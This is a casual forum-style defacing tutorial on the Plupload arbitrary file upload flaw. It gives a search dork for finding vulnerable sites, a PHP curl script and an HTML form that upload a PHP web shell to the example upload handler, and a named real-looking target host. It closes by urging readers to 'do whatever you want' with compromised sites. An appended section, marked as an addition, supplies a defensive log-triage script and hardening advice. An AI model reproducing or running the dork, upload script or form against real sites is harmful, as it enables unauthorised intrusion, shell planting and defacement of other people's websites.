Yo, what's up guys. This time I want to share about defacing with the Plupload Arbitrary File Upload. For those who don't know how yet, just read on.
Dork:
inurl:/plupload/examples/
For the rest, use your brain, don't be spoiled.
Then pick one of the websites and enter the exploit below
/[path]/plupload/examples/upload.php
A sign that it is vulnerable is the text {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
PHP code:
<?php
$url = "http://target.com/plupload/examples/upload.php"; // put URL Here
$post = array
(
"file" => "@chaYankVica.jpg",
"name" => "chaYankVica.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
CSRF :
<html>
<body>
<form method="post" action="http://devel.movieparkholidays.atlanticmoon.com/3rdParty/plupload/1.5.1.1/examples/upload.php" enctype="multipart/form-data">
<input type="file" name="file"/>
<input type="hidden" name="name" value="bypas.php" />
<input type="submit" value="submit"/>
</form>
</body>
</html>
For the CSRF form, in value="bypas.php" /> the name bypas.php can be replaced with the name of your shell.
OK, now open your CSRF form and upload your shell.
If your shell has been uploaded, you will probably see something like this
http://devel.movieparkholidays.atlanticmoon.com/3rdParty/plupload/1.5.1.1/examples/upload.php
Accessing your shell?
[path]/plupload/examples/uploads/shell.php
Hehe, my shell uploaded successfully.
Once the shell is uploaded, do whatever you want with the website.
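For site owners, the requests described in this post leave a recognizable trail in web server access logs. The following is an added example, not code from the original post: a Python triage script that flags successful POSTs to the Plupload example handler and later requests for script files in its uploads directory. The Combined Log Format, the function name `triage` and the sample lines are assumptions constructed for illustration.

```python
import re

# Combined Log Format prefix: ip ident user [time] "METHOD target PROTO" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
# The example upload handler named on this page, with an optional version directory.
HANDLER = re.compile(r'/plupload/(?:[^/]+/)?examples/upload\.php$', re.I)
# Server-executable files requested from that handler's uploads directory.
DROPPED = re.compile(
    r'/plupload/(?:[^/]+/)?examples/uploads/[^/]+\.(?:php\d?|phtml|phar)$', re.I)

def triage(lines):
    """Return (uploads, executions), each a list of (ip, time, path, status)."""
    uploads, executions = [], []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not in the assumed log format
        ip, when, method, target, status = m.groups()
        path = target.split("?", 1)[0]  # ignore the query string
        hit = (ip, when, path, int(status))
        if not status.startswith("2"):
            continue  # only requests the server actually served
        if method == "POST" and HANDLER.search(path):
            uploads.append(hit)      # a file was submitted to the handler
        elif DROPPED.search(path):
            executions.append(hit)   # a script in uploads/ was served
    return uploads, executions

# Constructed sample lines (documentation IP ranges, hypothetical paths).
SAMPLE = [
    '203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "POST /static/plupload/1.5.1.1/'
    'examples/upload.php HTTP/1.1" 200 52 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2024:10:01:09 +0000] "GET /static/plupload/1.5.1.1/'
    'examples/uploads/x.php?c=1 HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [12/Mar/2024:10:02:00 +0000] "GET /plupload/examples/'
    'upload.php HTTP/1.1" 200 52 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Mar/2024:10:03:00 +0000] "GET /plupload/examples/'
    'uploads/photo.jpg HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    ups, execs = triage(SAMPLE)
    for label, hits in (("upload", ups), ("script served", execs)):
        for ip, when, path, status in hits:
            print(f"{label}: {ip} [{when}] {path} -> {status}")
```

Any hit under "script served" means a file in the uploads directory should be treated as a web shell and the host investigated. The lasting fix is to remove the `examples` directory from production deployments and to disable script execution in upload directories.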